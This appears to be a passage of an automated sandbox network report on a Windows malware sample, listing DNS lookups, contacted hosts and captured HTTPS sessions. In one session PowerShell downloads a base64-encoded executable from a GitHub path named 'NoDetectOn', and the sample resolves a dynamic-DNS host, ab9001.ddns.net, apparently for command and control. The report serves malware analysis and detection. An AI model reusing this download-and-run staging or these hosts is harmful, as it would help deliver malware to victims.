                                                                                Oct 4, 2024 11:35:02.557156086 CEST1.1.1.1192.168.2.50x3a6No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.557156086 CEST1.1.1.1192.168.2.50x3a6No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.557156086 CEST1.1.1.1192.168.2.50x3a6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.557156086 CEST1.1.1.1192.168.2.50x3a6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.558228016 CEST1.1.1.1192.168.2.50x9686No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:02.558228016 CEST1.1.1.1192.168.2.50x9686No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:15.186580896 CEST1.1.1.1192.168.2.50xd7f5No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:15.187695026 CEST1.1.1.1192.168.2.50xce10No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:20.840159893 CEST1.1.1.1192.168.2.50x9b72No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:20.852581978 CEST1.1.1.1192.168.2.50x6819No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 4, 2024 11:35:42.166039944 CEST1.1.1.1192.168.2.50x7b15No error (0)ab9001.ddns.net64.188.16.157A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • raw.githubusercontent.com
                                                                                • otelrules.azureedge.net
                                                                                • slscr.update.microsoft.com
                                                                                • paste.ee
                                                                                • https:
                                                                                  • js.monitor.azure.com
                                                                                  • wcpstatic.microsoft.com

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549705185.199.110.1334437136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:48 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-10-04 09:33:48 UTC902INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 2935468
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: DDDE:3E1F9D:6A875A:733786:66FFB31C
                                                                                Accept-Ranges: bytes
                                                                                Date: Fri, 04 Oct 2024 09:33:48 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740069-EWR
                                                                                X-Cache: HIT
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1728034429.756231,VS0,VE58
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 34243b5ab7ab140ca9d94299e7b695c6ae0badb4
                                                                                Expires: Fri, 04 Oct 2024 09:38:48 GMT
                                                                                Source-Age: 0
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                1192.168.2.54970713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:50 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:50 UTC540INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:50 GMT
                                                                                Content-Type: text/plain
                                                                                Content-Length: 218853
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public
                                                                                Last-Modified: Mon, 30 Sep 2024 13:16:38 GMT
                                                                                ETag: "0x8DCE1521DF74B57"
                                                                                x-ms-request-id: 90766f9b-701e-006f-578c-15afc4000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093350Z-15767c5fc554wklc0x4mc5pq0w0000000ct000000000097f
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:50 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
